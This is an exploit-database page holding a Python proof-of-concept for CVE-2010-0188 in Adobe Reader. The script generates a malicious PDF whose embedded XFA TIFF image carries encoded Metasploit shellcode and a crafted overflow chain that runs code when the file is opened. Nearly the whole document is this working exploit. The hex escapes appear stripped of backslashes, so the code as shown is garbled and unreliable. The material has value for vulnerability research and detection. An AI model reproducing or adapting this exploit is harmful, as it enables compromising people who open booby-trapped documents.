[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Adobe Reader PDF LibTiff Integer Overflow Code Execution
# Published : 2010-03-17
# Author : villy
# Previous Title : Virtual PC Hypervisor Memory Protection Vulnerability
# Next Title : VariCAD 2010-2.05 EN Local buffer overflow
__doc__='''
Title: Adobe PDF LibTiff Integer Overflow Code Execution.
Product: Adobe Acrobat Reader
Version: <=8.3.0, <=9.3.0
CVE: 2010-0188
Author: villy (villys777 at gmail.com)
Site: http://bugix-security.blogspot.com/
Tested : succesfully tested on Adobe Reader 9.1/9.2/9.3 OS Windows XP(SP2,SP3)
------------------------------------------------------------------------
'''
import sys
import base64
import struct
import zlib
import StringIO
SHELLCODE_OFFSET=0x555
TIFF_OFSET=0x2038
# windows/exec - 227 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=process, CMD=calc.exe
buf = "x2bxc9xd9xc0xd9x74x24xf4x5exb1x33xbaxd9xb4"
buf += "x0axbex31x56x15x03x56x15x83x1fxb0xe8x4bx63"
buf += "x51x65xb3x9bxa2x16x3dx7ex93x04x59x0bx86x98"
buf += "x29x59x2bx52x7fx49xb8x16xa8x7ex09x9cx8exb1"
buf += "x8ax10x0fx1dx48x32xf3x5fx9dx94xcax90xd0xd5"
buf += "x0bxccx1bx87xc4x9bx8ex38x60xd9x12x38xa6x56"
buf += "x2ax42xc3xa8xdfxf8xcaxf8x70x76x84xe0xfbxd0"
buf += "x35x11x2fx03x09x58x44xf0xf9x5bx8cxc8x02x6a"
buf += "xf0x87x3cx43xfdxd6x79x63x1exadx71x90xa3xb6"
buf += "x41xebx7fx32x54x4bx0bxe4xbcx6axd8x73x36x60"
buf += "x95xf0x10x64x28xd4x2ax90xa1xdbxfcx11xf1xff"
buf += "xd8x7axa1x9ex79x26x04x9ex9ax8exf9x3axd0x3c"
buf += "xedx3dxbbx2axf0xccxc1x13xf2xcexc9x33x9bxff"
buf += "x42xdcxdcxffx80x99x13x4ax88x8bxbbx13x58x8e"
buf += "xa1xa3xb6xccxdfx27x33xacx1bx37x36xa9x60xff"
buf += "xaaxc3xf9x6axcdx70xf9xbexaex17x69x22x1fxb2"
buf += "x09xc1x5fx00"
class CVE20100188Exploit:
def __init__(self,shellcode):
self.shellcode = shellcode
self.tiff64=base64.b64encode(self.gen_tiff())
def gen_tiff(self):
tiff = 'x49x49x2ax00'
tiff += struct.pack("<L", TIFF_OFSET)
tiff += 'x90' * (SHELLCODE_OFFSET)
tiff += self.shellcode
tiff += 'x90' * (TIFF_OFSET - 8 - len(buf) - SHELLCODE_OFFSET)
tiff += "x07x00x00x01x03x00x01x00"
tiff += "x00x00x30x20x00x00x01x01x03x00x01x00x00x00x01x00"
tiff += "x00x00x03x01x03x00x01x00x00x00x01x00x00x00x06x01"
tiff += "x03x00x01x00x00x00x01x00x00x00x11x01x04x00x01x00"
tiff += "x00x00x08x00x00x00x17x01x04x00x01x00x00x00x30x20"
tiff += "x00x00x50x01x03x00xCCx00x00x00x92x20x00x00x00x00"
tiff += "x00x00x00x0Cx0Cx08x24x01x01x00xF7x72x00x07x04x01"
tiff += "x01x00xBBx15x00x07x00x10x00x00x4Dx15x00x07xBBx15"
tiff += "x00x07x00x03xFEx7FxB2x7Fx00x07xBBx15x00x07x11x00"
tiff += "x01x00xACxA8x00x07xBBx15x00x07x00x01x01x00xACxA8"
tiff += "x00x07xF7x72x00x07x11x00x01x00xE2x52x00x07x54x5C"
tiff += "x00x07xFFxFFxFFxFFx00x01x01x00x00x00x00x00x04x01"
tiff += "x01x00x00x10x00x00x40x00x00x00x31xD7x00x07xBBx15"
tiff += "x00x07x5Ax52x6Ax02x4Dx15x00x07x22xA7x00x07xBBx15"
tiff += "x00x07x58xCDx2Ex3Cx4Dx15x00x07x22xA7x00x07xBBx15"
tiff += "x00x07x05x5Ax74xF4x4Dx15x00x07x22xA7x00x07xBBx15"
tiff += "x00x07xB8x49x49x2Ax4Dx15x00x07x22xA7x00x07xBBx15"
tiff += "x00x07x00x8BxFAxAFx4Dx15x00x07x22xA7x00x07xBBx15"
tiff += "x00x07x75xEAx87xFEx4Dx15x00x07x22xA7x00x07xBBx15"
tiff += "x00x07xEBx0Ax5FxB9x4Dx15x00x07x22xA7x00x07xBBx15"
tiff += "x00x07xE0x03x00x00x4Dx15x00x07x22xA7x00x07xBBx15"
tiff += "x00x07xF3xA5xEBx09x4Dx15x00x07x22xA7x00x07xBBx15"
tiff += "x00x07xE8xF1xFFxFFx4Dx15x00x07x22xA7x00x07xBBx15"
tiff += "x00x07xFFx90x90x90x4Dx15x00x07x22xA7x00x07xBBx15"
tiff += "x00x07xFFxFFxFFx90x4Dx15x00x07x31xD7x00x07x2Fx11"
tiff += "x00x07"
return tiff
def gen_xml(self):
xml= '''<?xml version="1.0" encoding="UTF-8" ?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config xmlns="http://www.xfa.org/schema/xci/1.0/">
<present>
<pdf>
<version>1.65</version>
<interactive>1</interactive>
<linearized>1</linearized>
</pdf>
<xdp>
<packets>*</packets>
</xdp>
<destination>pdf</destination>
</present>
</config>
<template baseProfile="interactiveForms" xmlns="http://www.xfa.org/schema/xfa-template/2.4/">
<subform name="topmostSubform" layout="tb" locale="en_US">
<pageSet>
<pageArea id="PageArea1" name="PageArea1">
<contentArea name="ContentArea1" x="0pt" y="0pt" w="612pt" h="792pt" />
<medium short="612pt" long="792pt" stock="custom" />
</pageArea>
</pageSet>
<subform name="Page1" x="0pt" y="0pt" w="612pt" h="792pt">
<break before="pageArea" beforeTarget="#PageArea1" />
<bind match="none" />
<field name="ImageField1" w="28.575mm" h="1.39mm" x="37.883mm" y="29.25mm">
<ui>
<imageEdit />
</ui>
</field>
<?templateDesigner expand 1?>
</subform>
<?templateDesigner expand 1?>
</subform>
<?templateDesigner FormTargetVersion 24?>
<?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?>
<?templateDesigner Zoom 94?>
</template>
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
<xfa:data>
<topmostSubform>
<ImageField1 xfa:contentType="image/tif" href="">'''+self.tiff64 +'''</ImageField1>
</topmostSubform>
</xfa:data>
</xfa:datasets>
<PDFSecurity xmlns="http://ns.adobe.com/xtd/" print="1" printHighQuality="1" change="1" modifyAnnots="1" formFieldFilling="1" documentAssembly="1" contentCopy="1" accessibleContent="1" metadata="1" />
<form checksum="a5Mpguasoj4WsTUtgpdudlf4qd4=" xmlns="http://www.xfa.org/schema/xfa-form/2.8/">
<subform name="topmostSubform">
<instanceManager name="_Page1" />
<subform name="Page1">
<field name="ImageField1" />
</subform>
<pageSet>
<pageArea name="PageArea1" />
</pageSet>
</subform>
</form>
</xdp:xdp>
'''
return xml
def gen_pdf(self):
xml = zlib.compress(self.gen_xml())
pdf='''%PDF-1.6
1 0 obj
<</Filter /FlateDecode/Length ''' + str(len(xml)) + '''/Type /EmbeddedFile>>
stream
''' + xml+'''
endstream
endobj
2 0 obj
<</V () /Kids [3 0 R] /T (topmostSubform[0]) >>
endobj
3 0 obj
<</Parent 2 0 R /Kids [4 0 R] /T (Page1[0])>>
endobj
4 0 obj
<</MK <</IF <</A [0.0 1.0]>>/TP 1>>/P 5 0 R/FT /Btn/TU (ImageField1)/Ff 65536/Parent 3 0 R/F 4/DA (/CourierStd 10 Tf 0 g)/Subtype /Widget/Type /Annot/T (ImageField1[0])/Rect [107.385 705.147 188.385 709.087]>>
endobj
5 0 obj
<</Rotate 0 /CropBox [0.0 0.0 612.0 792.0]/MediaBox [0.0 0.0 612.0 792.0]/Resources <</XObject >>/Parent 6 0 R/Type /Page/PieceInfo null>>
endobj
6 0 obj
<</Kids [5 0 R]/Type /Pages/Count 1>>
endobj
7 0 obj
<</PageMode /UseAttachments/Pages 6 0 R/MarkInfo <</Marked true>>/Lang (en-us)/AcroForm 8 0 R/Type /Catalog>>
endobj
8 0 obj
<</DA (/Helv 0 Tf 0 g )/XFA [(template) 1 0 R]/Fields [2 0 R]>>
endobj xref
trailer
<</Root 7 0 R/Size 9>>
startxref
14765
%%EOF'''
return pdf
if __name__=="__main__":
print __doc__
if len(sys.argv) != 2:
print "Usage: %s [output.pdf]" % sys.argv[0]
print "Creating Exploit to %sn"% sys.argv[1]
exploit=CVE20100188Exploit(buf)
f = open(sys.argv[1],mode='wb')
f.write(exploit.gen_pdf())
f.close()
print "[+] done !"